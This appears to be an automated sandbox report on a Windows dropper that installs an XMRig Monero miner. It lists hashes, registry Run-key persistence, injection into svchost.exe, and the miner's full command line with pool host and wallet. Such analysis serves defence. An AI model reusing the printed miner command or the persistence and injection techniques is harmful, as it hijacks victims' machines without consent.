Analysis

max time kernel: 152s
max time network: 157s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 16-05-2022 12:54

Static task: static1
Behavioral task: behavioral1
  Sample: 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
  Resource: win10v2004-20220414-en

General

Target: 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
Size: 19.7MB
MD5: 59d485e89a3c1b7e0fd31aeaa01c4a26
SHA1: ae6e6326ad6198add70b74e89f747f622fd1bbd3
SHA256: 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398
SHA512: 0d3a73d86b4aed04f9257f7fccf4c6339cae7fd287f279889ce39b05b798059351175eb6538a13f9ef2cf936db241cbf4e4ff8d717793284d90cdf5d5a4eb46b
Malware Config
Signatures
XMRig Miner Payload (5 IoCs)
Processes:
  resource | yara_rule
  behavioral2/memory/4060-138-0x0000000140000000-0x0000000140753000-memory.dmp | xmrig
  behavioral2/memory/4060-139-0x000000014029169C-mapping.dmp | xmrig
  behavioral2/memory/4060-140-0x0000000140000000-0x0000000140753000-memory.dmp | xmrig
  behavioral2/memory/4060-141-0x0000000140000000-0x0000000140753000-memory.dmp | xmrig
  behavioral2/memory/4060-144-0x0000000140000000-0x0000000140753000-memory.dmp | xmrig
Executes dropped EXE (1 IoC)
Processes:
  pid | process
  4664 | lolupdate.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
Loads dropped DLL (1 IoC)
Processes:
  pid | process
  4060 | svchost.exe
Adds Run key to start application (2 TTPs, 1 IoC)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lolupdate.exe = "C:\\Users\\Admin\\AppData\\Roaming\\lolupdate.exe" | 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
Suspicious use of SetThreadContext (1 IoC)
Processes:
  description | pid | process | target process
  PID 4664 set thread context of 4060 | 4664 | lolupdate.exe | svchost.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (23 IoCs)
Processes:
  pid | process
  4644 | 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
  (the same row is reported 23 times)
Suspicious behavior: LoadsDriver (1 IoC)
Processes:
  pid | process
  652 | (not reported)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
  description | pid | process
  Token: SeDebugPrivilege | 4644 | 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
  Token: SeDebugPrivilege | 4664 | lolupdate.exe
  Token: SeLockMemoryPrivilege | 4060 | svchost.exe
  Token: SeLockMemoryPrivilege | 4060 | svchost.exe
Suspicious use of WriteProcessMemory (17 IoCs)
Processes:
  description | pid | process | target process
  PID 4644 wrote to memory of 4664 | 4644 | 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe | lolupdate.exe
  PID 4644 wrote to memory of 4664 | 4644 | 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe | lolupdate.exe
  PID 4664 wrote to memory of 4060 | 4664 | lolupdate.exe | svchost.exe
  (the last row is reported 15 times)
Processes

1. C:\Users\Admin\AppData\Local\Temp\6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398.exe"
   - Checks computer location settings
   - Adds Run key to start application
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory

   2. C:\Users\Admin\AppData\Roaming\lolupdate.exe (child of 1)
      Command line: "C:\Users\Admin\AppData\Roaming\lolupdate.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\svchost.exe (child of 2)
         Command line: C:\Windows\System32\svchost.exe --opencl --cuda --donate-level=4 -B --coin=monero --url=gulf.moneroocean.stream:10128 --user=491AFfs2Fhj9c1AXyinqpn5TJTAb5JqAC1G1WAjKfTj8KAeuFHHP3USSVvFLFnw132LwCzVgfxNDmaWfXPyXDyBj4yVW3Vv --pass=NewVictims --cpu-max-threads-hint=70 --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --cuda-loader="C:\Users\Admin\AppData\Roaming\WinCFG\Libs\ddb64.dll"
         - Loads dropped DLL
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Roaming\WinCFG\Libs\ddb64.dll
  Filesize: 19.5MB
  MD5: 4b9507ee2bfd925468b952c57fb694ed
  SHA1: 6d46148f43d09f681ff88279ed047a7ab5cd4ea2
  SHA256: 1b2b4b6ef86fc06d680821da380232d7c7885fcbf9b9f012c46a3e2699654ba1
  SHA512: 84bc4bf118e9055f4cca9fcb974ead33b8130ced53f736ab8e75596cb2e7567d5c24db88fa4ce6a17c465775a6e618d4697a82ddac8e30b70bc269f3ab5333df
C:\Users\Admin\AppData\Roaming\lolupdate.exe
  Filesize: 19.7MB
  MD5: 59d485e89a3c1b7e0fd31aeaa01c4a26
  SHA1: ae6e6326ad6198add70b74e89f747f622fd1bbd3
  SHA256: 6d9316744fc8955158b3c74b142e3365d5c13358510e14c6309bd6f5f6d98398
  SHA512: 0d3a73d86b4aed04f9257f7fccf4c6339cae7fd287f279889ce39b05b798059351175eb6538a13f9ef2cf936db241cbf4e4ff8d717793284d90cdf5d5a4eb46b
Memory dumps (file, filesize):
  memory/4060-138-0x0000000140000000-0x0000000140753000-memory.dmp  7.3MB
  memory/4060-144-0x0000000140000000-0x0000000140753000-memory.dmp  7.3MB
  memory/4060-147-0x000001C2250E0000-0x000001C225100000-memory.dmp  128KB
  memory/4060-146-0x000001C2235D0000-0x000001C2235F0000-memory.dmp  128KB
  memory/4060-142-0x000001C223570000-0x000001C223584000-memory.dmp  80KB
  memory/4060-139-0x000000014029169C-mapping.dmp  (no size reported)
  memory/4060-140-0x0000000140000000-0x0000000140753000-memory.dmp  7.3MB
  memory/4060-141-0x0000000140000000-0x0000000140753000-memory.dmp  7.3MB
  memory/4644-130-0x0000000000E40000-0x0000000002202000-memory.dmp  19.8MB
  memory/4644-131-0x00007FFDAAF90000-0x00007FFDABA51000-memory.dmp  10.8MB
  memory/4664-132-0x0000000000000000-mapping.dmp  (no size reported)
  memory/4664-135-0x00007FFDAAF90000-0x00007FFDABA51000-memory.dmp  10.8MB
  memory/4664-137-0x0000000002440000-0x000000000244A000-memory.dmp  40KB
  memory/4664-136-0x0000000002450000-0x0000000002462000-memory.dmp  72KB